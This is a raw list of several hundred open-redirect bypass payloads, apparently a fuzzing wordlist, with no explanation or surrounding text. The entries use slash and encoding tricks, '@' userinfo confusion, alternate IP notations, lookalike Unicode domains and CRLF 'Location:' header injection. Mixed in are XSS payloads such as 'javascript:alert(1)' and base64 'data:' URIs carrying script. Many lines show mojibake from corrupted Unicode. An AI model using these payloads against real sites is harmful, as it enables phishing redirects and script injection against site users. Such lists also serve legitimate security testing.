
/ã€±bing.com
ã€±bing.com
/ã€±google.com
ã€±google.com
/ã€±localdomain.pw
ã€±localdomain.pw
/ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€µbing.com
ã€µbing.com
/ã€µgoogle.com
ã€µgoogle.com
/ã€µlocaldomain.pw
ã€µlocaldomain.pw
/ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã‚bing.com
ã‚bing.com
/ã‚google.com
ã‚google.com
/ã‚localdomain.pw
ã‚localdomain.pw
/ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ãƒ¼bing.com
ãƒ¼bing.com
/ï½°bing.com
ï½°bing.com
/ãƒ¼google.com
ãƒ¼google.com
/ï½°google.com
ï½°google.com
/ãƒ¼localdomain.pw
ãƒ¼localdomain.pw
/ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ï½°localdomain.pw
ï½°localdomain.pw
/ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
$2f%2f216.58.214.206%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%01https://google.com
%01https://localdomain.pw
%01https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/bing.com
//%09/bing.com
///%09/bing.com
////%09/bing.com
/%09/example.com
//%09/example.com
///%09/example.com
////%09/example.com
/%09/example.com@google.com
//%09/example.com@google.com
///%09/example.com@google.com
////%09/example.com@google.com
/%09/google.com
//%09/google.com
///%09/google.com
////%09/google.com
%09http:///traidnt.net%40bing.com
%09Jav%09ascript:alert(1)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/localdomain.pw
//%09/localdomain.pw
///%09/localdomain.pw
////%09/localdomain.pw
/%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/traidnt.net@bing.com
//%09/traidnt.net@bing.com
///%09/traidnt.net@bing.com
////%09/traidnt.net@bing.com
/%09/whitelisted.com@google.com
//%09/whitelisted.com@google.com
///%09/whitelisted.com@google.com
////%09/whitelisted.com@google.com
/%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/WillBeReplaced.com@google.com
//%09/WillBeReplaced.com@google.com
///%09/WillBeReplaced.com@google.com
////%09/WillBeReplaced.com@google.com
/%09/www.whitelisteddomain.tld@google.com
//%09/www.whitelisteddomain.tld@google.com
///%09/www.whitelisteddomain.tld@google.com
////%09/www.whitelisteddomain.tld@google.com
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
/%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
%0A/localdomain.pw
%0A/localdomain.pw/?
%0A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
&%0d%0a1Location:https://google.com
/%0D%0Ahttp://bing.com/
/%0D%0Ahttp://bing.com/?
/%0D/bing.com
/%0D/bing.com/?
\152\141\166\141\163\143\162\151\160\164\072alert(1)
172.217.167.46
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
%20//bing.com
%20//bing.com/?
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
%2520%252f%252fbing.com
%252F@localdomain.pw
%252F@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f$2f216.58.214.206
%2f$2f3627734734
%2f$2fgoogle.com
%2f216.58.214.206
%2f216.58.214.206//
%2f216.58.214.206%2f%2f
%2f%2e%2e
/%2f%2f%2fbing.com%2f%3fwww.omise.co
%%2f2fbing.com
/%2f%2fbing.com
/%2f%2fbing.com/?
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2fgoogle.com/?
//%2f%2fgoogle.com
/%2f%2flocaldomain.pw
//%2f%2flocaldomain.pw
/%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
%2fgoogle.com%2f%2f
/%2F/localdomain.pw
/%2F/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2fxgoogle.com
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//3H6k7lIAiqjfNeN@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//3H6k7lIAiqjfNeN@traidnt.net+@bing.com/
//3H6k7lIAiqjfNeN@traidnt.net@bing.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@WillBeReplaced.com+@google.com/
//3H6k7lIAiqjfNeN@WillBeReplaced.com@google.com/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tldâº@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tldâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/%5cbing.com
//%5cbing.com
///%5cbing.com
////%5cbing.com
/%5cexample.com
//%5cexample.com
///%5cexample.com
////%5cexample.com
/%5cexample.com@google.com
//%5cexample.com@google.com
///%5cexample.com@google.com
////%5cexample.com@google.com
/%5cgoogle.com
//%5cgoogle.com
///%5cgoogle.com
////%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
/%5clocaldomain.pw
//%5clocaldomain.pw
///%5clocaldomain.pw
////%5clocaldomain.pw
/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5ctraidnt.net@bing.com
//%5ctraidnt.net@bing.com
///%5ctraidnt.net@bing.com
////%5ctraidnt.net@bing.com
/%5cwhitelisted.com@google.com
//%5cwhitelisted.com@google.com
///%5cwhitelisted.com@google.com
////%5cwhitelisted.com@google.com
/%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cwhitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5cWillBeReplaced.com@google.com
//%5cWillBeReplaced.com@google.com
///%5cWillBeReplaced.com@google.com
////%5cWillBeReplaced.com@google.com
/%5cwww.whitelisteddomain.tld@google.com
//%5cwww.whitelisteddomain.tld@google.com
///%5cwww.whitelisteddomain.tld@google.com
////%5cwww.whitelisteddomain.tld@google.com
/%5cwww.whitelisteddomain.tld@localdomain.pw
//%5cwww.whitelisteddomain.tld@localdomain.pw
///%5cwww.whitelisteddomain.tld@localdomain.pw
////%5cwww.whitelisteddomain.tld@localdomain.pw
/%5cwww.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5cwww.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5cwww.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cwww.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
%68%74%74%70%73%3a%2f%2f%77%77%77%2e%62%69%6e%67%2e%63%6f%6d
";alert(0);//
//.@.@attacker.com
//bing%00.com
..bing.com
.bing.com
/.bing.com
/.bing.com/?
//.@.@bing.com
/////bing.com
/////bing.com/
/////bing.com/?
////bing.com/
////bing.com//
///\;@bing.com
///\;@bing.com/?
///bing.com
///bing.com/
///bing.com//
///bing.com/?
//bing.com
//bing.com/
//bing.com//
//bing.com?
//bingã€‚com 
//bingã€‚com /?
/@.@bing.com/?
/\/bing.com/
<>//bing.com
@bing.com
\/\/bing.com/
bing.com/
////bing.com/%2e%2e
///bing.com/%2e%2e
////bing.com/%2e%2e%2f
///bing.com/%2e%2e%2f
//bing.com/%2e%2e%2f
////bing.com/%2f..
///bing.com/%2f..
//bing.com/%2f
////bing.com/%2f%2e%2e
///bing.com/%2f%2e%2e
//bing.com/%2f%2e%2e
/bing.com/%2f%2e%2e
/bing.com/%2f%2e%2e/?
//bing.com:80#@traidnt.net/
//bing.com:80?@traidnt.net/
//bing.com\@traidnt.net
//bing.com\ttraidnt.net/
////bing%E3%80%82com
//bing%E3%80%82com
//bing%E3%80%82com 
//bing%E3%80%82com/? 
crlftest%0dLocation:https://google.com
data:text/html;base64,aHR0cHM6Ly93d3cuYmluZy5jb20=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//dir:1%252f@evil.com
//dir:1%2f@evil.com
//evil.com/%252e%252e/dir
//evil.com/%2e%2e/dir
/.example.com
/////example.com
/////example.com/
/////example.com/?
////\;@example.com
////\;@example.com/?
////example.com/
////example.com//
///\;@example.com
///example.com
///example.com/
///example.com//
//example.com
//example.com/
//example.com//
/<>//example.com
/\/\/example.com/
/\/example.com/
////example.com/%2e%2e
///example.com/%2e%2e
//example.com/%2e%2e
////example.com/%2e%2e%2f
///example.com/%2e%2e%2f
//example.com/%2e%2e%2f
////example.com/%2f..
///example.com/%2f..
//example.com/%2f..
////example.com/%2f%2e%2e
///example.com/%2f%2e%2e
//example.com/%2f%2e%2e
/example.com/%2f%2e%2e
////example.com@google.com/
////example.com@google.com//
///example.com@google.com/
///example.com@google.com//
//example.com@google.com/
//example.com@google.com//
////example.com@google.com/%2e%2e
///example.com@google.com/%2e%2e
////example.com@google.com/%2e%2e%2f
///example.com@google.com/%2e%2e%2f
//example.com@google.com/%2e%2e%2f
////example.com@google.com/%2f..
///example.com@google.com/%2f..
//example.com@google.com/%2f..
////example.com@google.com/%2f%2e%2e
///example.com@google.com/%2f%2e%2e
//example.com@google.com/%2f%2e%2e
//example.com+&@google.com#+@example.com/
//example.com@https:///google.com/%2e%2e
//google%00.com
/\google%252ecom
google%252ecom
../google.com
.google.com
/.google.com
/////google.com
/////google.com/
/////google.com/?
////\;@google.com
////google.com
////google.com/
////google.com//
///;@google.com
///\;@google.com
///\;@google.com/?
///google.com
///google.com/
///google.com//
//;@google.com
//\/google.com/
//\google.com
//google.com
//google.com/
//google.com//
//googleã€‚com
/<>//google.com
/?google.com
/@.@google.com
/@.@google.com/?
/\/\/google.com/
/\/\google.com
/\/google.com
/\/google.com/
/\google.com
/google.com
<>//google.com
?google.com
@google.com
\/\/google.com/
google.com
google.com%23@whitelisted.com
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F..
//google.com/%2F.. 
/google.com/%2F..
/google.com/%2F.. 
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:80#@example.com/
//google.com:80?@example.com/
//google.com:80#@whitelisted.com/
//google.com:80?@whitelisted.com/
//google.com:80#@WillBeReplaced.com/
//google.com:80?@WillBeReplaced.com/
//google.com\@example.com
google.com/.jpg
//google.com\texample.com/
//google.com\twhitelisted.com/
//google.com\tWillBeReplaced.com/
//google.com/whitelisted.com
//google.com\@whitelisted.com
google.com/whitelisted.com
//google.com\@WillBeReplaced.com
//google.com\@www.whitelisteddomain.tld
//google%E3%80%82com
hthttp://tp://google.com
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dgoogle.com
http:%0a%0dlocaldomain.pw
http:%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::204.79.197.200]
http:[::204.79.197.200]
http://[::216.58.214.206]
http:[::216.58.214.206]
http://3627734734
http:3627734734
http%3A%2F%2Fwww.google.com
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::204.79.197.200]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@traidnt.net+@bing.com/
http://3H6k7lIAiqjfNeN@traidnt.net@bing.com/
http://3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
http://3H6k7lIAiqjfNeN@whitelisted.com@google.com/
http://3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@WillBeReplaced.com+@google.com/
http://3H6k7lIAiqjfNeN@WillBeReplaced.com@google.com/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tldâº@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tldâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://472.314.470.462
http:472.314.470.462
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%77%77%77%2e%62%69%6e%67%2e%63%6f%6d
http:/bing%252ecom
/http://bing.com
/http://bing.com/?
/http:/bing.com
/http:/bing.com/?
http://;@bing.com
http://bing.com%23.traidnt.net/
http://bing.com%23.traidnt.net/?
http://bing.com%2f%2f.traidnt.net/
http://bing.com%2f%2f.traidnt.net/?/.bing.com/?
http://bing.com%3F.traidnt.net/
http://bing.com%3F.traidnt.net/?
http://bing.com%5c%5c.traidnt.net/
http://bing.com%5c%5c.traidnt.net/?
http://bing.com:80#@traidnt.net/
http://bing.com:80?@traidnt.net/
http://bing.com\ttraidnt.net/
/http://example.com
/http:/example.com
http://example.com@00330.00072.0000326.00000316
http:example.com@00330.00072.0000326.00000316
http://example.com@00330.0x3a.54990
http:example.com@00330.0x3a.54990
http://example.com@00330.3856078
http:example.com@00330.3856078
http://example.com@0330.072.0326.0316
http:example.com@0330.072.0326.0316
http://example.com@0xd8.072.54990
http:example.com@0xd8.072.54990
http://example.com@0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.3856078
http:example.com@0xd8.3856078
http://example.com@0xd83ad6ce
http:example.com@0xd83ad6ce
http://example.com@[::216.58.214.206]
http:example.com@[::216.58.214.206]
http://example.com%2egoogle.com/
http://example.com%2egoogle.com/?
http://example.com@3627734734
http:example.com@3627734734
http://example.com@472.314.470.462
http:example.com@472.314.470.462
http://example.com:80%40google.com/
http://example.com:80%40google.com/?
http://example.com@[::ffff:216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http://example.com+&@google.com#+@example.com/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
/http://google.com
/http://google.com/?
/http:/google.com
/http:/google.com/?
http://.google.com
http://;@google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
hTTp://google.com
HtTP://google.com
HTTP://google.com
http://google.com%23.example.com/
http://google.com%23.example.com/?
http://google.com%23.whitelisted.com/
http://google.com%23.WillBeReplaced.com/
http://google.com%2f%2f.example.com/
http://google.com%2f%2f.example.com/?
http://google.com%2f%2f.whitelisted.com/
http://google.com%2f%2f.WillBeReplaced.com/
http://google.com%3F.example.com/
http://google.com%3F.example.com/?
http://google.com%3F.whitelisted.com/
http://google.com%3F.WillBeReplaced.com/
http://google.com%5c%5c.example.com/
http://google.com%5c%5c.example.com/?
http://google.com%5c%5c.whitelisted.com/
http://google.com%5c%5c.WillBeReplaced.com/
http://google.com:80#@example.com/
http://google.com:80?@example.com/
http://google.com:80#@whitelisted.com/
http://google.com:80?@whitelisted.com/
http://google.com:80#@WillBeReplaced.com/
http://google.com:80?@WillBeReplaced.com/
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:80?@www.whitelisteddomain.tld/
http://google.com\texample.com/
http://google.com\twhitelisted.com/
http://google.com\tWillBeReplaced.com/
http:http://bing.com
/http://localdomain.pw
/http:/localdomain.pw
http://.localdomain.pw
http://;@localdomain.pw
http://ï¹”@localdomain.pw
http:/localdomain.pw
http:localdomain.pw
/http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.www.whitelisteddomain.tld/
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:80?@www.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@www.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@www.whitelisteddomain.tld/
http://localdomain.pw\twww.whitelisteddomain.tld/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twww.whitelisteddomain.tld/
/http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.whitelisted.com/
http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.whitelisted.com/
